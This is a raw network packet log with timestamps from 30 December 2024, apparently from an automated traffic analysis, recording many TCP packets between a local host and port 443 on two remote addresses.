                                                                                                              Dec 30, 2024 11:37:36.772981882 CET44350504142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.773092031 CET50504443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:36.788332939 CET50501443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.788360119 CET44350501142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.788866997 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:36.788952112 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.789047003 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:36.789130926 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.789170980 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.789282084 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.789472103 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.789478064 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.789479971 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:36.789515972 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.871670008 CET44350502142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.871727943 CET50502443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.871752977 CET44350502142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.871790886 CET50502443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.872010946 CET50502443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.872050047 CET44350502142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.872212887 CET50502443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.872658014 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:36.872692108 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.872757912 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:36.872862101 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.872889996 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.872947931 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.872987032 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:36.872999907 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:36.873353004 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:36.873370886 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.401786089 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.401859999 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.402549028 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.402597904 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.404269934 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.404282093 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.404529095 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.404588938 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.405081034 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.411456108 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.411515951 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.418287992 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.418306112 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.418649912 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.418699026 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.419061899 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.447325945 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.459341049 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.475560904 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.475636959 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.476433039 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.476476908 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.480854034 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.480865002 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.481112957 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.481169939 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.481537104 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.493422031 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.493508101 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.495161057 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.495174885 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.495448112 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.495500088 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.495881081 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.527324915 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.543335915 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.774828911 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.774884939 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.775038958 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.775084019 CET44350506142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.775150061 CET50506443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.775971889 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.776014090 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.776093960 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.776797056 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.776812077 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.815731049 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.815792084 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.815820932 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.815850019 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.815865040 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.815886974 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.815891027 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.815924883 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.815932035 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.815960884 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.824594021 CET50505443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.824623108 CET44350505142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.825197935 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.825241089 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.825676918 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.826000929 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.826014042 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.849726915 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.849780083 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.849797964 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.849806070 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.849848986 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.850188971 CET50508443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.850203991 CET44350508142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.850858927 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.850897074 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.850994110 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.851260900 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:37.851265907 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.976123095 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.976172924 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.976186037 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.976212978 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.976229906 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.976253033 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.976259947 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.976314068 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.976356983 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.977231979 CET50507443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.977253914 CET44350507142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.978286982 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.978343010 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:37.978579998 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.978694916 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:37.978708029 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.377058983 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.377743006 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.377743006 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.377765894 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.380558014 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.380567074 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.424427032 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.424568892 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.427432060 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.427443981 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.427858114 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.427864075 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.458051920 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.458110094 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.458465099 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.458472013 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.458633900 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.458638906 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.596817017 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.597234964 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.604685068 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.604692936 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.605417967 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.605426073 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.748354912 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.748471022 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.748485088 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.749068975 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.749110937 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.749110937 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.749130964 CET44350509142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.749203920 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.749203920 CET50509443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.749670982 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.749712944 CET44350514142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.750313997 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.750885963 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.750897884 CET44350514142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.826050043 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.826124907 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.826148033 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.826215029 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.826598883 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.826641083 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.826864958 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.840306044 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.840403080 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.840403080 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.840424061 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.840442896 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.840473890 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.840481997 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.840507984 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.840514898 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.840543032 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.841157913 CET50512443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.841182947 CET44350512142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.842017889 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.842061996 CET44350515142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.842139959 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.842329025 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:38.842344999 CET44350515142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.845588923 CET50511443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.845608950 CET44350511142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.846143007 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.846164942 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:38.846261024 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.846504927 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:38.846514940 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.007697105 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.007761955 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.007832050 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.007848978 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.007864952 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.007889032 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.007982969 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.011734962 CET50513443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.011749029 CET44350513142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.013129950 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.013161898 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.013217926 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.013665915 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.013678074 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.358736992 CET44350514142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.359294891 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.401211023 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.401237011 CET44350514142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.401850939 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.401855946 CET44350514142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.446995020 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.451246023 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.468482971 CET44350515142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.468547106 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.470609903 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.470624924 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.472318888 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.472323895 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.474534035 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.474548101 CET44350515142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.474672079 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.474678040 CET44350515142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.649430037 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.649492979 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.650016069 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.650037050 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.650266886 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.650271893 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.737273932 CET44350514142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.737320900 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.737747908 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.737776995 CET44350514142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.737829924 CET50514443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.738395929 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.738424063 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.738502026 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.738801003 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.738811016 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.839529991 CET44350515142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.839684010 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.839766979 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.839802980 CET44350515142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.839854956 CET50515443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.840730906 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.840780973 CET44350521142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.840835094 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.841870070 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:39.841895103 CET44350521142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.860331059 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.860378981 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.860390902 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.860416889 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.860431910 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.860446930 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.860452890 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.860496044 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.860501051 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.860511065 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.860536098 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.860557079 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.861357927 CET50516443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.861371994 CET44350516142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.861953974 CET50522443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.861996889 CET44350522142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:39.862078905 CET50522443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.862329006 CET50522443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:39.862344980 CET44350522142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.062696934 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.062748909 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.062758923 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.062769890 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.062784910 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.062822104 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.062825918 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.062880039 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.062884092 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.062920094 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.063736916 CET50519443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.063752890 CET44350519142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.064168930 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.064212084 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.064268112 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.064557076 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.064567089 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.337070942 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.337151051 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.337826967 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.337912083 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.343480110 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.343502998 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.343795061 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.344360113 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.344360113 CET50520443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.387327909 CET44350520142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.450989008 CET44350521142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.451056957 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.451086044 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.451765060 CET44350521142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.451816082 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.453910112 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.453921080 CET44350521142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.454168081 CET44350521142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.454217911 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.454579115 CET50521443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:40.460131884 CET44350522142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.460191965 CET50522443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.460691929 CET50522443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.460704088 CET44350522142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.460932970 CET50522443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.460937977 CET44350522142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.499325991 CET44350521142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.686826944 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.686919928 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.687470913 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.687470913 CET50523443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:40.687500000 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.687514067 CET44350523142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:40.712582111 CET44350520142.250.186.142192.168.2.4
